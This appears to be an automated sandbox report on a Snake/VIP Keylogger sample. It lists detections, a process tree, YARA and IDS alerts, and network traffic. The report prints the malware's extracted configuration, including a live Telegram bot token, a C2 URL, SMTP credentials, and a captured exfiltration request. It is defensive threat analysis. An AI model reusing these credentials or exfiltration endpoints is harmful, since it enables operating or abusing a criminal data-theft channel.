Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mKRflLn5sx.exe

Overview

General Information

Sample name:mKRflLn5sx.exe
renamed because original name is a hash value
Original sample name:0a0777441380c8bff668c4ef87b88334f9b26c3d45f3a9b2a4059cc893cb3244.exe
Analysis ID:1631785
MD5:e5e246a339b3295d2c1f72cbfbae9b97
SHA1:d3df90ea88f66bf2584b20e288bf91126a050286
SHA256:0a0777441380c8bff668c4ef87b88334f9b26c3d45f3a9b2a4059cc893cb3244
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Drops VBS files to the startup folder
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mKRflLn5sx.exe (PID: 5500 cmdline: "C:\Users\user\Desktop\mKRflLn5sx.exe" MD5: E5E246A339B3295D2C1F72CBFBAE9B97)
    • Glagolitic.exe (PID: 5960 cmdline: "C:\Users\user\Desktop\mKRflLn5sx.exe" MD5: E5E246A339B3295D2C1F72CBFBAE9B97)
      • RegSvcs.exe (PID: 4400 cmdline: "C:\Users\user\Desktop\mKRflLn5sx.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 6616 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Glagolitic.exe (PID: 5168 cmdline: "C:\Users\user\AppData\Local\croc\Glagolitic.exe" MD5: E5E246A339B3295D2C1F72CBFBAE9B97)
      • RegSvcs.exe (PID: 5944 cmdline: "C:\Users\user\AppData\Local\croc\Glagolitic.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendMessage"}
{"Exfil Mode": "SMTP", "Bot Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat id": "5013849544", "Email ID": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
{"Exfil Mode": "Telegram", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587", "Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat_id": "5013849544", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
  • 0xb6be:$a1: get_encryptedPassword
  • 0xb9df:$a2: get_encryptedUsername
  • 0xb4dc:$a3: get_timePasswordChanged
  • 0xb5d7:$a4: get_passwordField
  • 0xb6d4:$a5: set_encryptedPassword
  • 0xcdad:$a7: get_logins
  • 0xccf9:$a10: KeyLoggerEventArgs
  • 0xc95e:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d8be:$a1: get_encryptedPassword
        • 0x2dbdf:$a2: get_encryptedUsername
        • 0x2d6dc:$a3: get_timePasswordChanged
        • 0x2d7d7:$a4: get_passwordField
        • 0x2d8d4:$a5: set_encryptedPassword
        • 0x2efad:$a7: get_logins
        • 0x2eef9:$a10: KeyLoggerEventArgs
        • 0x2eb5e:$a11: KeyLoggerEventArgsEventHandler
        Click to see the 27 entries
        SourceRuleDescriptionAuthorStrings
        5.2.Glagolitic.exe.3830000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          5.2.Glagolitic.exe.3830000.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            5.2.Glagolitic.exe.3830000.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              5.2.Glagolitic.exe.3830000.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x2babe:$a1: get_encryptedPassword
              • 0x2bddf:$a2: get_encryptedUsername
              • 0x2b8dc:$a3: get_timePasswordChanged
              • 0x2b9d7:$a4: get_passwordField
              • 0x2bad4:$a5: set_encryptedPassword
              • 0x2d1ad:$a7: get_logins
              • 0x2d0f9:$a10: KeyLoggerEventArgs
              • 0x2cd5e:$a11: KeyLoggerEventArgsEventHandler
              5.2.Glagolitic.exe.3830000.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x39891:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x38f34:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x39191:$a4: \Orbitum\User Data\Default\Login Data
              • 0x39b70:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 19 entries

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , ProcessId: 6616, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 118.69.190.131, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 4400, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49722
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , ProcessId: 6616, ProcessName: wscript.exe

              Data Obfuscation

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\croc\Glagolitic.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-07T15:50:43.230844+010028033053Unknown Traffic192.168.2.849684104.21.64.1443TCP
              2025-03-07T15:50:49.268787+010028033053Unknown Traffic192.168.2.849689104.21.64.1443TCP
              2025-03-07T15:50:51.913989+010028033053Unknown Traffic192.168.2.849692104.21.64.1443TCP
              2025-03-07T15:50:59.219440+010028033053Unknown Traffic192.168.2.849701104.21.64.1443TCP
              2025-03-07T15:51:03.054661+010028033053Unknown Traffic192.168.2.849705104.21.64.1443TCP
              2025-03-07T15:51:06.161508+010028033053Unknown Traffic192.168.2.849709104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-07T15:50:37.156584+010028032742Potentially Bad Traffic192.168.2.849682193.122.6.16880TCP
              2025-03-07T15:50:40.997696+010028032742Potentially Bad Traffic192.168.2.849682193.122.6.16880TCP
              2025-03-07T15:50:43.950928+010028032742Potentially Bad Traffic192.168.2.849685193.122.6.16880TCP
              2025-03-07T15:50:47.107057+010028032742Potentially Bad Traffic192.168.2.849687193.122.6.16880TCP
              2025-03-07T15:50:49.685227+010028032742Potentially Bad Traffic192.168.2.849687193.122.6.16880TCP
              2025-03-07T15:50:53.669591+010028032742Potentially Bad Traffic192.168.2.849694193.122.6.16880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-07T15:51:19.238090+010018100081Potentially Bad Traffic192.168.2.849725149.154.167.220443TCP
              2025-03-07T15:51:30.732422+010018100081Potentially Bad Traffic192.168.2.849728149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-07T15:51:07.840320+010018100071Potentially Bad Traffic192.168.2.849710149.154.167.220443TCP
              2025-03-07T15:51:20.212081+010018100071Potentially Bad Traffic192.168.2.849726149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: mKRflLn5sx.exeAvira: detected
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.kdvjy
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat id": "5013849544", "Email ID": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587", "Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat_id": "5013849544", "Version": "4.4"}
              Source: RegSvcs.exe.4400.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendMessage"}
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeReversingLabs: Detection: 78%
              Source: mKRflLn5sx.exeVirustotal: Detection: 63%Perma Link
              Source: mKRflLn5sx.exeReversingLabs: Detection: 78%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpackString decryptor: sales-nguyen@vvtrade.vn
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpackString decryptor: qVyP6qyv6MQCmZJBRs4t
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpackString decryptor: mail.vvtrade.vn
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpackString decryptor: saleseuropower@yandex.com
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpackString decryptor: 587
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpackString decryptor: 7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpackString decryptor: 5013849544
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpackString decryptor:

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: mKRflLn5sx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49683 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49690 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49726 version: TLS 1.2
              Source: Binary string: wntdll.pdbUGP source: Glagolitic.exe, 00000002.00000003.873219780.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000002.00000003.869410933.0000000004380000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.985607309.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.986640218.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Glagolitic.exe, 00000002.00000003.873219780.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000002.00000003.869410933.0000000004380000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.985607309.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.986640218.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0311F8E9h3_2_0311F631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0311FD41h3_2_0311FA88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00E1F8E9h6_2_00E1F631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00E1FD41h6_2_00E1FA88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 065231E0h6_2_06522DC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06520D0Dh6_2_06520B30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06521697h6_2_06520B30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06522C19h6_2_06522968
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652E0A9h6_2_0652DE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652E959h6_2_0652E6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652F209h6_2_0652EF60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652CF49h6_2_0652CCA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652D7F9h6_2_0652D550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652E501h6_2_0652E258
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652EDB1h6_2_0652EB08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652F661h6_2_0652F3B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_06520040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652FAB9h6_2_0652F810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652D3A1h6_2_0652D0F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 065231E0h6_2_0652310E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0652DC51h6_2_0652D9A8

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49726 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49710 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49728 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49725 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficTCP traffic: 192.168.2.8:49722 -> 118.69.190.131:587
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/03/2025%20/%2014:39:37%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
